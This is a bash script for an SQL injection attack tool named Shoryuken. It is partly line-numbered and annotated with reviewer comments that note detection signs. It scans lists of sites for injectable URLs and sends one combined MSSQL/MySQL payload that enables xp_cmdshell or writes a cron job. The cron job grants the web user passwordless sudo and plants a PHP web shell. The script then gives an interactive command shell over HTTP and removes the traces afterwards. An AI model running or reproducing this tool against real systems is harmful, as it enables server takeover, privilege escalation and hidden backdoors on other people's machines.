  1. #!/bin/bash
  2.  
  3. ### Shoryuken by Brute Logic ###
  4.  
  5. version="1.5"
  6. agent="Mozilla/4.0"
  7. timeout=1
  8. option=$1
  9. target=$2
  10. output=$3
  11. www1="c:\inetpub\wwwroot\\"
  12. sh1=$(cat /dev/urandom | tr -cd a-z | head -c 6)".txt"
  13. www2="/var/www/"
  14. sh2=$(cat /dev/urandom | tr -cd a-z | head -c 6)".php"

### Weak Spot ###

  18. function WEAK_SPOT {
  19.  
  20. param=$(echo $target | sed 's/.*?//1' | sed 's/.*&//1')
  21. tparam=$(echo $param | sed 's/.*=//1' | tr -cd a-z)
  22.  
  23. if [ -z $tparam ]
  24. then
  25.  q="%20"
  26. else
  27.  q="%27"
  28. fi
  29.  
  30. }

### Cleaning ###

  34. function CLEANING {
  35.  
  36. if [ "$ptype" = 'ASP' ]
  37. then
  38.  curl -A $agent -s "$target+exec+xp_cmdshell+%5Bdel%20$www1$sh1%5D" >/dev/null
  39. else
  40.  curl -A $agent "$target_root/$sh2?c=n=\$(sudo+cat+/etc/sudoers|wc+-l);sudo+rm+$www2$sh2;sudo+sed+-i+%22\$n+d%22+/etc/sudoers"
  41. fi
  42.  
  43. echo -e "\n[+] Cleaned."
  44.  
  45. }

### Shell ###

function SHELL {

# Interactive pseudo-shell over HTTP, entered from PUNCH after a 200 reply.
# Each typed line becomes one GET request (two on the MSSQL path: run, then
# fetch the output file); the remote output is whatever the last curl
# prints. Globals read: target, ptype, agent, www1/sh1, www2/sh2. Globals
# written: target_root, pre, on, t, cmd, arg1-3, payload and output (the
# script-level $3 is overwritten here). "exit"/"quit" run CLEANING and then
# `break`, which is aimed at the dispatch loop under ### BEGIN ###.

# Host part of $target: "http://" and everything from the first "/" on are
# dropped.
target_root=$(echo $target | sed 's/http:\/\///1' | sed 's/\/.*//1')
# URL-encoded "cd .&&": prefix every remote command is chained behind;
# "cd" commands are accumulated into it instead of being sent.
pre="cd%20.%26%26"
on=0
t=59

# PHP/MySQL path: PUNCH writes under /etc/cron.d/, so the dropped script is
# presumably only there after the next cron minute — wait it out first.
if [ "$ptype" = 'PHP' ]
then
while [ $t -gt 0 ]
do
  echo -ne "[.] Waiting $((t--)) seconds for shell...\r"
  sleep 1
done
echo -e "[+] Read to go.                                 \n"
fi

while [ 1 ]
do

 # read splits the line into at most four words; anything past the third
 # argument is folded into arg3. Neither read uses -r.
 if [ "$ptype" = 'ASP' ]
 then
   read -p "C:\shoryuken> " cmd arg1 arg2 arg3
 else
   read -p "sho@ryuken:~# " cmd arg1 arg2 arg3
  fi

  # Minimal URL-encoding of the three characters that would break the query
  # string (%, &, "); spaces are re-added as %20 when the payload is built.
  arg1=$(echo $arg1 | sed 's/%/%25/g'| sed 's/&/%26/g' | sed 's/"/%22/g')
  arg2=$(echo $arg2 | sed 's/%/%25/g'| sed 's/&/%26/g' | sed 's/"/%22/g')
  arg3=$(echo $arg3 | sed 's/%/%25/g'| sed 's/&/%26/g' | sed 's/"/%22/g')

  # NOTE(review): the `?)` arm is an unquoted glob, so any single-character
  # command (not only "?") prints the help text instead of being sent.
  case $cmd in

            ?) echo -e "[+] Type on/off to display payload or not (default off).\n[+] Append &&echo after echo commands to write to a file.\n";;
    exit|quit) CLEANING
               break;;
           on) echo -e "[+] Payload display is ON.\n"
               on=1;;
          off) echo -e "[+] Payload display is OFF.\n"
               on=0;;
            *) if [ "$cmd" = 'cd' ]
               then
                 # Not sent: appended to the prefix so later commands run
                 # from that directory.
                 pre="$pre$cmd%20$arg1%20$arg2%20$arg3%26%26"
               else
                 if [ "$ptype" = 'ASP' ]
                 then
                   # MSSQL: xp_cmdshell runs the command with its output
                   # redirected into $www1$sh1 under the web root.
                   cmd="$pre$cmd%20$arg1%20$arg2%20$arg3"
                   payload="+exec+xp_cmdshell+%5B$cmd>$www1$sh1%5D+--sp_password+"
                 else
                   # PHP: the command, prefixed with sudo, goes into the c=
                   # parameter of the dropped script.
                   cmd="$pre%20sudo%20$cmd%20$arg1%20$arg2%20$arg3"
                   payload="$cmd"
                 fi  

                 # Local echo of the request, only when toggled on.
                 if [ $on = 1 ]
                 then
                   echo -e "[+] Payload: $payload"
                   echo ""
                 fi

                 if [ "$ptype" = 'ASP' ]
                 then
                   # Run via the injection point; the reply itself is
                   # ignored, the output file is fetched below.
                   curl -A $agent -s "$target$payload" >/dev/null
                   output=$sh1
                 else
                   output=$sh2?c=$payload
                 fi

                 # Fetch from the web root. Detection: a stream of GETs for
                 # a random six-letter .txt/.php name directly under the web
                 # root, all with User-Agent "Mozilla/4.0" (the global agent).
                 curl -A $agent "$target_root/$output"
                 echo ""
               fi

  esac

done

}

### Punch ###

function PUNCH {

# The "punch" (-p): one request that carries an MSSQL payload and a MySQL
# payload at the same time, then a branch on the HTTP status code. Globals
# read: target, agent, www1/sh1, www2/sh2, plus q/param set by WEAK_SPOT.
# Globals written: mssqli, mysqli, hex, shoryuken, status, PHP, ASP, ptype.
# A 200 hands over to SHELL and then `break`s (aimed at the dispatch loop
# under ### BEGIN ###).

WEAK_SPOT

# MSSQL chain: sp_configure to turn xp_cmdshell on, then xp_cmdshell
# "whoami" with its output redirected to $www1$sh1 under the web root. sed
# turns every "+" of the template into the inline comment "/*&param=value*/",
# so the statement is delivered as many repeated copies of the same query
# parameter with the separators hidden inside SQL comments — presumably to
# survive however the application joins duplicate parameters.
# NOTE(review): the trailing "--sp_password" is presumably there because SQL
# Server leaves statements containing that token out of trace output; web
# access logs and xp_cmdshell auditing are the more reliable detection
# sources for this request.
mssqli=$(echo "$q+exec+sp_configure+%5Bshow%20advanced%20options%5D,1+reconfigure+exec+sp_configure%5Bxp_cmdshell%5D,1+reconfigure+exec+xp_cmdshell+%5Bwhoami>$www1$sh1%5D+--sp_password+" | sed -e "s/+/\/\*\&$param\*\//g")

# Hex encoding of the path of the PHP file the MySQL payload creates. echo
# adds a newline, so its 0a byte ends up in the hex string as well.
hex=$(echo $www2$sh2 | od -A n -t x1 | sed 's/ //g' | tr -d '\n')
# MySQL chain (/*! ... */ is only parsed by MySQL): SELECT ... INTO OUTFILE
# to /etc/cron.d/s, which needs the FILE privilege and a server running as
# root, as the HELP text states. The long 0x… "lines terminated by" literal
# is presumably the hex-encoded cron line that ends up in that file; it is
# left undecoded here.
# Detection: "into outfile", "/etc/cron.d/" and "xp_cmdshell" together in
# one query string; a new file /etc/cron.d/s; a new six-letter .php file
# directly in /var/www/.
mysqli="$q/*!+into+outfile%22/etc/cron.d/s%22+fields+enclosed+by+0x23+lines+terminated+by+0x0A2A202A202A202A202A20726F6F74202F62696E2F6563686F20277777772D6461746120414C4C3D28414C4C29204E4F5041535357443A20414C4C273E3E2F6574632F7375646F6572732026202F62696E2F726D202F6574632F63726F6E2E642F732026202F62696E2F6563686F20273C3F706870206563686F20706173737468727528245F4745545B635D293B203F3E273E$hex*/#"

# One request, both payloads: the MySQL part rides on a second copy of the
# injected parameter.
shoryuken=$(curl -A $agent -s -i "$target$mssqli&$param$mysqli")

# Status code = status line minus "HTTP/x.y", keeping only the digits 0-5.
status=$(echo -e "$shoryuken" | head -n 1 | sed "s/HTTP....//1" | tr -cd 0-5)
# Stack fingerprint via the X-Powered-By header; ASP wins when present,
# anything else is treated as PHP. A server that does not send that header
# is therefore always handled as PHP — suppressing it removes the
# fingerprint this code relies on.
PHP=$(echo -e "$shoryuken" | grep X-Powered-By | grep PHP)
ASP=$(echo -e "$shoryuken" | grep X-Powered-By | grep ASP)

if [ -n "$ASP" ]
then
  ptype="ASP"
else
  ptype="PHP"
fi

# NOTE: the 302 arm's message says "301" (message text only, left as is).
case $status in

  200) echo -e "[!] Punch given (status code 200), enjoy your shell if vulnerable.\n"
       echo -e "[*] Type ? to help.\n"
       SHELL
       break;;
  301) echo -e "[-] Punch dodged (status code 301), review target.";;
  302) echo -e "[-] Punch dodged (status code 301), review target.";;
  404) echo -e "[-] Punch missed (status code 404), review target.";;
  500) echo -e "[-] Punch failed (status code 500), maybe detected.";;
  503) echo -e "[-] Server is down (status code 503), try again.";;
    *) echo -e "[-] An error occurred, review your settings.";;

esac  

}

### Test ###

  169. function TEST {
  170.  
  171. WEAK_SPOT
  172.  
  173. mssqli=$(echo "$q+and+0<(+select+is_srvrolemember+(convert+(char,0x73797361646D696E)));--sp_password+" | sed -e "s/+/\/\*\&$param\*\//g")
  174.  
  175. mysqli="$q/*!+and+0<locate(0x3d726f6f74,replace(load_file(0x2f6574632f6d7973716c2f6d792e636e66),0x20,0x3D))+or+0<locate(0x3d726f6f74,replace(load_file(0x2f6574632f6d792e636e66),0x20,0x3D))*/#"
  176.  
  177. req1=$(curl -A $agent --connect-timeout $timeout -s -i "$target" | wc -c)
  178.  
  179. req2=$(curl -A $agent --connect-timeout $timeout -s -i "$target$mssqli&$param$mysqli")
  180. status=$(echo -e "$req2" | head -n 1 | sed "s/HTTP....//1" | tr -cd 0-5)
  181. req2=$(echo -ne "$req2" | wc -c)
  182.  
  183. if [ $req1 = 0 -o $req2 = 0 ]
  184. then
  185.   echo -e "[-] Not vulnerable to shoryuken."
  186.   vuln=0
  187. else
  188.   if [ $status = 200 ]
  189.   then
  190.     if [ $req1 = $req2 ]
  191.     then
  192.       echo -e "[!] Target may be VULNERABLE to shoryuken."
  193.       vuln=1
  194.     else
  195.       echo -e "[-] Not vulnerable to shoryuken."
  196.       vuln=0
  197.     fi
  198.   else
  199.       echo -e "[-] It was not possible to test the target."
  200.       vuln=0
  201.   fi
  202. fi
  203.  
  204. }

### List Mode ###

  208. function LIST {
  209.  
  210. touch ./$output
  211.  
  212. for line in $(cat $target)
  213. do
  214.   target=$line
  215.   TEST
  216.   if [ $vuln = 1 ]
  217.   then
  218.     echo $target >> ./$output
  219.   fi
  220. done
  221.  
  222. echo -e "\n[+] Found "$(cat $output | wc -l)" vulnerable targets."
  223.  
  224. }


### Scan Mode ###

  229. function SCAN {
  230.  
  231. try[1]="/?id=1"
  232. try[2]="/index.php?id=1"
  233. try[3]="/default.asp?id=1"
  234. try[4]="/default.aspx?id=1"
  235. try[5]="/article.php?id=1"
  236. try[6]="/article.asp?id=1"
  237.  
  238. touch ./$output
  239.  
  240. for line in $(cat $target)
  241. do
  242.   for n in {1..6}
  243.   do
  244.     scan=$(curl -A $agent --connect-timeout $timeout -s -i "$line/${try[$n]}" | head -n 1 | sed "s/HTTP....//1" | tr -cd 0-5)
  245.    
  246.     if [ -z $scan ]
  247.     then
  248.       break
  249.     fi
  250.  
  251.     if [ $scan = 200 ]
  252.     then
  253.       echo -e "[!] Found: $line${try[$n]}"
  254.       echo "$line${try[$n]}" >> $output
  255.     fi
  256.   done
  257. done
  258.  
  259. }


### Interactive Mode ###

function INTERACTIVE {

# Interactive mode (-i): asks for a target, optionally runs TEST, then calls
# PUNCH. Every `break` here is meant to leave the dispatch loop under
# ### BEGIN ### — NOTE(review): presumably relies on bash letting a
# function's `break` act on the caller's loop; confirm for the bash version
# in use. Globals written: t, v, target.

echo -e "[?] Type target (format: domain/path/page?parameter_to_test=value):"
# read without -r and an unquoted [ -z $t ]: input containing backslashes or
# spaces is not handled as typed.
read t
if [ -z $t ]
then
  echo -e "[-] Target can not be blank, quitting..."
  break
else
  target=$t
fi

# Single silent keypress menus. After TEST the "Continue?" answer is what
# decides; the vuln result itself is not checked here.
echo -e "\n[?] Test if it is vulnerable first?\n[1] Yes\n[2] Skip this step\n"
read -s -n 1 v
  case $v in
    1) TEST
       echo -e "\n[?] Continue?\n[1] Yes\n[2] No\n"
       read -s -n 1 v
       case $v in
         1) echo -e "[+] Preparing rising dragon punch...";;
         2) echo -e "[-] Quitting..."
            break;;
         *) echo -e "[-] Invalid option, quitting..."
            break;;
       esac;;
    2) echo -e "[+] Preparing rising dragon punch...";;
    *) echo -e "[-] Invalid option, quitting..."
       break;;
   esac

PUNCH

}

### Help Menu ###

  300. function HELP {
  301.  
  302. echo -e "Author:\n\tBrute Logic (http://about.me/brutelogic) Twitter @brutelogic\n\nDescription:\n\tShoryuken is a tool designed to get full control of poorly configurated web applications with backend DBMS in the same machine. In its current version, it uses SQL injection techniques to own MYSQL and MSSQL hosts when they run as OS user ROOT with application user having file privileges (Linux MySQL) or as DB sysadmin user with DB running as OS user SYSTEM (Windows MSSQL). It is done using the same unique HTTP request, the shoryuken (that means \"rising dragon punch\" in japanese).\n\tAfter successful exploitation, a custom \"shell\" is provided using only port 80 (it will be always there) without need to download anything or relying on firewall's policy.\n\tShoryuken needs curl installed (Debian-like systems: apt-get install curl).\n\nUsage:\n\t./shoryuken$version [OPTION] {TARGET | INPUT_FILE} {OUTPUT_FILE}\n\t=> Rearrange URL if needed to put vulnerable parameter ALWAYS at the end.\n\nOptions:\n\t-h\thelp\n\t-i\tinteractive mode\n\t-p\tdirect punch\n\t-t\ttest mode\n\t-s\tscan from list\n\t-t\ttest from list\n\nExamples:\n\t./shoryuken$version -i\n\t./shoryuken$version -p \"192.168.0.2/test.asp?id=1\"\n\t./shoryuken$version -p \"vuln-site.net/home/news.php?info=text&vuln_param=11230\"\n\t./shoryuken$version -t \"www.example.com/page.php?name=john\"\n\t./shoryuken$version -s hosts.txt mytargets.txt\n\t./shoryuken$version -l mytargets.txt vulnerables.txt"
  303. break
  304.  
  305. }

### BEGIN ###

echo -e "[+] Shoryuken $version started.\n"

# Dispatch on the first argument. The single-pass `for i in 1` loop is here
# so that a `break` inside HELP/INTERACTIVE/PUNCH/SHELL ends the run early —
# NOTE(review): presumably relies on bash letting a function's `break` act
# on the caller's loop; confirm for the bash version in use. -l/-s read $2
# as an input list and $3 as the output file; -p/-t use $2 as the URL; -i
# prompts for everything.
for i in 1
do
  case $option in
  -i) INTERACTIVE;;
  -h) HELP;;
  -l) LIST;;
  -p) PUNCH;;
  -s) SCAN;;
  -t) TEST;;
   *) echo -e "[-] Invalid option, quitting..."
      break;;
  esac
done

echo -e "\n[+] Done."